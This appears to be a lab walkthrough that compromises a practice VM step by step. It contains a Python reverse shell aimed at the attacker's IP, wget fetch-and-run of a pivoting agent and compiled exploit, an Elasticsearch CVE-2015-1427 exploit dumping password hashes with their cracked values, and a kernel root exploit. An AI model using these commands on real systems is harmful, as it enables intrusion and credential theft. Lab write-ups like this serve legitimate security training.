● Host discovery
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:3e:92:fb, IPv4: 192.168.10.100
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.10.1 00:50:56:ff:c4:ee VMware, Inc.
192.168.10.2 00:50:56:c0:00:08 VMware, Inc.
192.168.10.15 00:0c:29:74:e0:7d VMware, Inc.
192.168.10.254 00:50:56:f1:51:7f VMware, Inc.
● Port and service scan
┌──(root㉿kali)-[~]
└─# nmap -p- 192.168.10.15
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-10 02:17 EST
Nmap scan report for 192.168.10.15
Host is up (0.00064s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
5000/tcp open upnp
MAC Address: 00:0C:29:74:E0:7D (VMware)
┌──(root㉿kali)-[~]
└─# nmap -p22,5000 -sC -sV 192.168.10.15
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 cc:53:20:b8:10:db:52:5f:16:02:bc:ee:57:22:80:e1 (DSA)
| 2048 01:50:f6:1f:32:e8:0d:fc:48:38:3e:c8:1b:ac:20:02 (RSA)
| 256 3b:ae:9a:bd:cb:ff:8f:54:64:32:ec:bf:38:fd:fe:6b (ECDSA)
|_ 256 77:4e:8b:20:73:52:a4:ee:93:1d:b3:85:f2:25:d7:55 (ED25519)
5000/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15)
|_http-title: Leave a message
MAC Address: 00:0C:29:74:E0:7D (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
● Web information gathering
Browsing to http://192.168.10.15:5000 shows nothing useful on the page itself.
A directory scan of http://192.168.10.15:5000 reveals a hidden directory, /admin:
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.10.15:5000
dirsearch v0.4.2
Target: http://192.168.10.15:5000/
[02:27:15] Starting:
[02:27:20] 200 - 401B - /admin
Task Completed
Browsing to http://192.168.10.15:5000/admin reveals a page that executes submitted commands.
![](https://img.haomeiwen.com/i8874065/49f1ced915c1a012.png)
● Code injection
Use a Python reverse shell. Before submitting the code, start nc on the Kali host listening on TCP port 5555.
Enter the following Python reverse shell at http://192.168.10.15:5000/admin:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.100",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
● Reverse shell
┌──(root㉿kali)-[~]
└─# nc -lvnp 5555
listening on [any] 5555 ...
connect to [192.168.10.100] from (UNKNOWN) [192.168.10.15] 40592
/app #
/app # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),
20(dialout),26(tape),27(video)
/app # whoami
root
/app # ls
Dockerfile
main.py
requirements.txt
templates
/app #
● Information gathering
The shell obtained is root, but it is running inside a Docker container rather than on the host.
Tip: two ways to tell that you are inside a Docker container:
Method one: check whether the file /.dockerenv exists in the root directory
ls /.dockerenv
Method two: check whether the cgroup paths in /proc/1/cgroup contain a /docker/ segment
cat /proc/1/cgroup
/app # ls /.dockerenv
/.dockerenv
/app # cat /proc/1/cgroup
11:hugetlb:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
10:perf_event:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
9:blkio:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
8:freezer:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
7:devices:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
6:memory:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
5:cpuacct:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
4:cpu:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
3:cpuset:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
2:name=systemd:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
/app #
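As an added example (not part of the original writeup), the two checks from the tip combined into one POSIX shell function. The file paths are parameters so it can be run against captured copies of /.dockerenv and /proc/1/cgroup as well as on the live system:

```shell
#!/bin/sh
# Added example: classify a system as a Docker container using the two
# indicators described above. Not code from the original writeup.
#
# Usage: is_docker_container [dockerenv_path] [cgroup_path]
# Prints "container" or "host"; returns 0 for container, 1 otherwise.
is_docker_container() {
    dockerenv="${1:-/.dockerenv}"
    cgroup="${2:-/proc/1/cgroup}"

    # Method one: Docker creates /.dockerenv in the container's root filesystem.
    if [ -e "$dockerenv" ]; then
        echo container
        return 0
    fi

    # Method two: with cgroup v1, PID 1's cgroup paths look like
    #   11:hugetlb:/docker/<64-hex container id>
    # Caveat: on cgroup v2 hosts /proc/1/cgroup is just "0::/", so this
    # indicator is absent and only method one applies.
    if [ -r "$cgroup" ] && grep -qE '^[0-9]+:[^:]*:/docker/[0-9a-f]+' "$cgroup"; then
        echo container
        return 0
    fi

    echo host
    return 1
}
```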
Internal network sweep: 172.17.0.1, 172.17.0.2 and 172.17.0.3 respond, so they are live hosts.
/app # for i in $(seq 1 254); do ping -c 1 172.17.0.$i; done
PING 172.17.0.1 (172.17.0.1): 56 data bytes
64 bytes from 172.17.0.1: seq=0 ttl=64 time=0.044 ms
--- 172.17.0.1 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.044/0.044/0.044 ms
PING 172.17.0.2 (172.17.0.2): 56 data bytes
64 bytes from 172.17.0.2: seq=0 ttl=64 time=0.041 ms
--- 172.17.0.2 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.041/0.041/0.041 ms
PING 172.17.0.3 (172.17.0.3): 56 data bytes
64 bytes from 172.17.0.3: seq=0 ttl=64 time=0.035 ms
--- 172.17.0.3 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.035/0.035/0.035 ms
PING 172.17.0.4 (172.17.0.4): 56 data bytes
● Internal network pivoting
Deploy the Venom pivoting tool.
In the Venom directory on the Kali host, start a Python 3 HTTP server so the Venom agent binary can be fetched by the target:
python3 -m http.server 80
┌──(root㉿kali)-[~/桌面/venom]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.10.15 - - [10/Feb/2023 03:01:33] "GET /agent_linux_x64 HTTP/1.1" 200 -
Start the Venom admin node, listening on local port 9999:
./admin_linux_x64 -lport 9999
┌──(root㉿kali)-[~/桌面/venom]
└─# ./admin_linux_x64 -lport 9999
Venom Admin Node Start...
____ ____ { v1.1 author: Dlive }
\ \ / /____ ____ ____ _____
\ Y // __ \ / \ / \ / \
\ /\ ___/| | ( <_> ) Y Y \
\___/ \___ >___| /\____/|__|_| /
\/ \/ \/
(admin node) >>>
[+]Remote connection: 192.168.10.15:36290
[+]A new node connect to admin node success    (the agent has checked in)
On the target, install the 64-bit agent:
cd /tmp
wget -c http://192.168.10.100/agent_linux_x64
chmod +x agent_linux_x64
./agent_linux_x64 -rhost 192.168.10.100 -rport 9999
The agent checks in successfully:
┌──(root㉿kali)-[~]
└─# nc -lvnp 5555
listening on [any] 5555 ...
connect to [192.168.10.100] from (UNKNOWN) [192.168.10.15] 58313
/app #
/app # cd /tmp
/tmp # ls
/tmp #
/tmp # wget -c http://192.168.10.100/agent_linux_x64
Connecting to 192.168.10.100 (192.168.10.100:80)
agent_linux_x64 100% |*******************************| 3791k 0:00:00 ETA
/tmp # ls
agent_linux_x64
/tmp # chmod +x agent_linux_x64
/tmp # ./agent_linux_x64 -rhost 192.168.10.100 -rport 9999
2023/02/10 08:02:03 [+]Successfully connects to a new node
The agent has checked in.
View and control the Venom node, then start a SOCKS tunnel:
(admin node) >>> show
A
+ -- 1
(admin node) >>> goto 1    (switch to node 1)
node 1
(node 1) >>> socks 1080    (open a SOCKS port on the node; local port 1080 on Kali now proxies traffic into the internal segment)
a socks5 proxy of the target node has started up on the local port 1080.
(node 1) >>>
Scan the internal network from the Venom admin host (Kali) through the SOCKS proxy.
To use Kali's tooling against the internal segment, edit the proxychains configuration so that it uses the SOCKS5 service on local port 1080, which forwards Kali's traffic into the internal network:
vi /etc/proxychains4.conf
Change the last line to:
socks5 127.0.0.1 1080
![](https://img.haomeiwen.com/i8874065/ac4bc467ecec9a6b.png)
sudo proxychains nmap -Pn -sT -sV 172.17.0.1
Nmap scan report for 172.17.0.1
Host is up (0.0096s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
5000/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
sudo proxychains nmap -Pn -sT -sV 172.17.0.2
Nmap scan report for 172.17.0.2
Host is up (0.0063s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
9200/tcp open http Elasticsearch REST API 1.4.2 (name: Ka-Zar; cluster: elasticsearch; Lucene 4.10.2)
sudo proxychains nmap -Pn -sT -sV 172.17.0.3
Result:
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.3:5000 ... OK
Nmap scan report for 172.17.0.3
Host is up (0.0095s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
5000/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15)
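The nmap banner for 172.17.0.2 reports Elasticsearch 1.4.2, which falls in the range affected by the Groovy sandbox bypass CVE-2015-1427 (fixed in 1.3.8 and 1.4.3). As an added example (not from the original writeup), a POSIX shell check that classifies a version string from such a banner, the kind of test an inventory or vulnerability-management script would run over scan output:

```shell
#!/bin/sh
# Added example: classify an Elasticsearch version against the fixed releases
# for CVE-2015-1427 (Groovy sandbox bypass). Affected: < 1.3.8, and 1.4.0-1.4.2.
# Not code from the original writeup.

# Usage: es_cve_2015_1427_status VERSION  -> prints "vulnerable" or "patched"
es_cve_2015_1427_status() {
    IFS=. read -r major minor patch <<EOF
$1
EOF
    patch="${patch:-0}"        # treat "1.4" as "1.4.0"
    # 0.x and 1.0 to 1.2: every release predates the fix
    if [ "$major" -lt 1 ] || { [ "$major" -eq 1 ] && [ "$minor" -lt 3 ]; }; then
        echo vulnerable; return 0
    fi
    # 1.3.x fixed in 1.3.8
    if [ "$major" -eq 1 ] && [ "$minor" -eq 3 ] && [ "$patch" -lt 8 ]; then
        echo vulnerable; return 0
    fi
    # 1.4.x fixed in 1.4.3
    if [ "$major" -eq 1 ] && [ "$minor" -eq 4 ] && [ "$patch" -lt 3 ]; then
        echo vulnerable; return 0
    fi
    echo patched; return 1
}

# Pull the version out of an nmap -sV service line like the one in the scan
# above and classify it. Prints "unknown" when the line is not an Elasticsearch
# banner. Input is supplied by the caller (a constructed sample in the test).
es_status_from_nmap_line() {
    ver=$(printf '%s\n' "$1" | sed -n 's/.*Elasticsearch REST API \([0-9][0-9.]*\).*/\1/p')
    [ -n "$ver" ] || { echo unknown; return 2; }
    es_cve_2015_1427_status "$ver"
}
```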
● Exploitation
Use the Elasticsearch vulnerability to obtain the target's login usernames and password hashes (the `passwords` file):
┌──(root㉿kali)-[~/桌面/venom]
└─# searchsploit elasticsearch
------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------ ---------------------------------
ElasticSearch - Remote Code Execution | linux/remote/36337.py
ElasticSearch - Remote Code Execution | multiple/webapps/33370.html
ElasticSearch - Search Groovy Sandbox Bypass (Metaspl | java/remote/36415.rb
ElasticSearch 1.6.0 - Arbitrary File Download | linux/webapps/38383.py
ElasticSearch 7.13.3 - Memory disclosure | multiple/webapps/50149.py
ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal | php/webapps/37054.py
ElasticSearch Dynamic Script - Arbitrary Java Executi | java/remote/33588.rb
Elasticsearch ECE 7.13.3 - Anonymous Database Dump | multiple/webapps/50152.py
------------------------------------------------------ ---------------------------------
Shellcodes: No Results
┌──(root㉿kali)-[~/桌面/venom]
└─# cp /usr/share/exploitdb/exploits/linux/remote/36337.py .
┌──(root㉿kali)-[~/桌面/venom]
└─# sudo proxychains python2 36337.py 172.17.0.2
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Exploit for ElasticSearch , CVE-2015-1427 Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$ cat passwords
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.2:9200 ... OK
Format: number,number,number,number,lowercase,lowercase,lowercase,lowercase
Example: 1234abcd
john:3f8184a7343664553fcb5337a3138814
test:861f194e9d6118f3d942a72be3e51749
admin:670c3bbc209a18dde5446e5e6c1f1d5b
root:b3d34352fc26117979deabdf1b9b6354
jane:5c158b60ed97c723b673529b8a3cf72b
~$ id
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.2:9200 ... OK
uid=0(root) gid=0(root) groups=0(root)
● Password cracking
The hashes are 32 hex characters (MD5 length) and the file's own format hint (four digits followed by four lowercase letters) narrows the search; they crack to:
john:3f8184a7343664553fcb5337a3138814 -> 1337hack
test:861f194e9d6118f3d942a72be3e51749 -> 1234test
admin:670c3bbc209a18dde5446e5e6c1f1d5b -> 1111pass
root:b3d34352fc26117979deabdf1b9b6354 -> 1234pass
jane:5c158b60ed97c723b673529b8a3cf72b -> 1234jane
● Local privilege escalation
Trying the credentials in turn, john:1337hack logs in to the target over SSH:
┌──(root㉿kali)-[~/桌面/venom]
└─# ssh john@192.168.10.15
john@192.168.10.15's password:
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)
* Documentation: https://help.ubuntu.com/
System information as of Fri Feb 10 11:18:26 EST 2023
System load: 0.0 Processes: 390
Usage of /: 12.8% of 14.64GB Users logged in: 0
Memory usage: 5% IP address for eth0: 192.168.10.15
Swap usage: 0%
Graph this data and manage this system at:
https://landscape.canonical.com/
New release '16.04.7 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Sun Oct 28 22:36:16 2018 from 10.0.0.8
john@socnet:~$
john@socnet:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)
john@socnet:~$ whoami
john
john@socnet:~$
The john user cannot escalate with sudo:
john@socnet:~$ sudo -s
[sudo] password for john:
john is not in the sudoers file. This incident will be reported.
Try a kernel exploit instead. First check the kernel version:
john@socnet:~$ uname -a
Linux socnet 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
john@socnet:~$
Search for matching exploit code:
┌──(root㉿kali)-[~/桌面/venom]
└─# searchsploit linux 3.13.0 ubuntu
------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------ ---------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/ | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/ | linux/local/37293.txt
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - | linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X8 | linux/local/31346.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Lo | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Pri | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilt | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16 | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / L | linux/local/47169.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via Us | linux/local/41760.txt
------------------------------------------------------ ---------------------------------
Shellcodes: No Results
But gcc is not installed on the target:
john@socnet:~$ gcc -v
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'
john@socnet:~$
Reading 37292.c also shows that it compiles ofs-lib.so at runtime, which needs gcc on the target. The plan is therefore to copy a pre-built ofs-lib.so out of the local library, comment out the code in 37292.c that builds it, compile on Kali, and upload the compiled binary together with ofs-lib.so to the target.
![](https://img.haomeiwen.com/i8874065/e24450c9b63189d3.png)
┌──(root㉿kali)-[~/桌面/venom/bbbb]
└─# cp /usr/share/exploitdb/exploits/linux/local/37292.c .
┌──(root㉿kali)-[~/桌面/venom/bbbb]
└─# vim 37292.c
Comment out the code that builds ofs-lib.so.
Locate the pre-built ofs-lib.so:
┌──(root㉿kali)-[~/桌面/venom/bbbb]
└─# locate ofs-lib.so
/usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so
┌──(root㉿kali)-[~/桌面/venom/bbbb]
└─# cp /usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so .
┌──(root㉿kali)-[~/桌面/venom/bbbb]
└─# gcc -o exp 37292.c
┌──(root㉿kali)-[~/桌面/venom/bbbb]
└─# ls
36337.py 37292.c exp ofs-lib.so
Upload the compiled exp and ofs-lib.so to the target.
Start an HTTP server on Kali:
┌──(root㉿kali)-[~/桌面/venom/bbbb]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
On the target, download exp and ofs-lib.so:
cd /tmp
wget http://192.168.10.100/exp
wget http://192.168.10.100/ofs-lib.so
john@socnet:/tmp$ ls
exp ofs-lib.so
john@socnet:/tmp$
john@socnet:/tmp$ chmod +x exp
john@socnet:/tmp$ ./exp
./exp: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./exp)
Awkward: it does not run. The error shows that exp was linked against Kali's newer glibc (GLIBC_2.34), which the Ubuntu 14.04 target does not have.
The only option left is the old method, even though it is unrealistic for a real engagement: install gcc and g++ on the target, upload the .c source, and compile and run it there.
john@socnet:/tmp$ gcc 37292.c
john@socnet:/tmp$ ./a.out
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
# id
uid=0(root) gid=0(root) groups=0(root),1001(john)
# whoami
root
# ls -al
total 56
drwxrwxrwt 3 root root 4096 Feb 10 07:29 .
drwxr-xr-x 22 root root 4096 Oct 27 2018 ..
-rwxrwxr-x 1 john john 4975 Feb 10 06:54 37292.c
-rwxrwxr-x 1 john john 13652 Feb 10 07:29 a.out
-rwxrwxr-x 1 john john 16936 Feb 10 06:54 exp
drwxr-xr-x 2 root root 4096 Feb 10 07:23 gcc
# pwd
/tmp
#